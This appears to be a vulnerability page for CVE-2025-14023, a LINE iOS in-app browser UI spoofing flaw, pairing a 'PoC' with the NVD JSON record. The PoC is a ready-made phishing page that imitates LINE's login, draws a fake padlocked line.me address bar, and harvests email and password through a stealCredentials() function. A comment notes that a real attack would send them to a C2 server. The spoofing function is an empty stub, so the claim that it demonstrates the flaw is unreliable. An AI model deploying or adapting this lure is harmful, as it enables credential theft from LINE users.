CVE-2025-14023

// CVE-2025-14023 UI Spoofing PoC for LINE iOS Client // This PoC demonstrates how an attacker can spoof LINE's trusted interface <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>LINE Security Alert</title> <style> /* Fake LINE header to mimic trusted interface */ .fake-header { background-color: #00B900; color: white; padding: 15px; font-family: -apple-system, BlinkMacSystemFont, sans-serif; text-align: center; } /* Fake address bar overlay */ .fake-address-bar { position: fixed; top: 0; left: 0; right: 0; height: 44px; background: rgba(255,255,255,0.97); display: flex; align-items: center; padding: 0 10px; border-bottom: 1px solid #ddd; z-index: 1000; } .fake-url { color: #333; font-size: 14px; margin-left: 10px; } /* Phishing form styled as LINE login */ .phishing-container { margin-top: 60px; padding: 20px; } .phishing-form { background: white; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); padding: 30px 20px; } .phishing-title { color: #00B900; font-size: 20px; font-weight: bold; margin-bottom: 20px; text-align: center; } .phishing-input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; font-size: 16px; } .phishing-button { width: 100%; padding: 12px; background-color: #00B900; color: white; border: none; border-radius: 5px; font-size: 16px; margin-top: 15px; cursor: pointer; } .security-notice { background: #FFF3CD; border: 1px solid #FFECB5; padding: 15px; border-radius: 5px; margin: 15px 0; font-size: 14px; color: #856404; } </style> </head> <body> <!-- Fake address bar to hide real URL --> <div class='fake-address-bar'> <span style='font-size:12px;color:#888'>🔒</span> <span class='fake-url'>https://line.me/official/home</span> </div> <div class='phishing-container'> <div class='phishing-form'> <div class='phishing-title'>⚠️ Account Security Alert</div> <div class='security-notice'> Your account has been flagged for suspicious activity. Please verify your identity to continue using LINE services. </div> <form id='phishForm' onsubmit='stealCredentials(event)'> <input type='email' class='phishing-input' placeholder='Email or LINE ID' required> <input type='password' class='phishing-input' placeholder='Password' required> <button type='submit' class='phishing-button'>Verify Account</button> </form> </div> </div> <script> // Hide the real page content behind fake UI function hideRealAddressBar() { // Attempt to overlay fake address bar // In real attack, this would use various techniques console.log('UI Spoofing: Hiding real address bar'); } function stealCredentials(event) { event.preventDefault(); const formData = { email: event.target[0].value, password: event.target[1].value, timestamp: new Date().toISOString(), userAgent: navigator.userAgent }; // In real attack, send to C2 server console.log('Stolen credentials:', formData); alert('Verification failed. Please try again.'); } // Initialize spoofing hideRealAddressBar(); </script> </body> </html>

{"cve": {"id": "CVE-2025-14023", "sourceIdentifier": "[email protected]", "published": "2025-12-15T07:15:51.110", "lastModified": "2026-01-07T16:15:49.270", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "LINE client for iOS prior to 15.19 allows UI spoofing due to inconsistencies between the navigation state and the in-app browser's user interface, which could create confusion about the trust context of displayed pages or interactive elements under specific conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "15.19.0", "matchCriteriaId": "6330C6B7-81E1-45B5-9425-47F4252E136F"}]}]}], "references": [{"url": "https://hackerone.com/reports/3260386", "source": "[email protected]", "tags": ["Permissions Required", "Third Party Advisory"]}, {"url": "https://hackerone.com/reports/3260386", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Permissions Required", "Third Party Advisory"]}]}}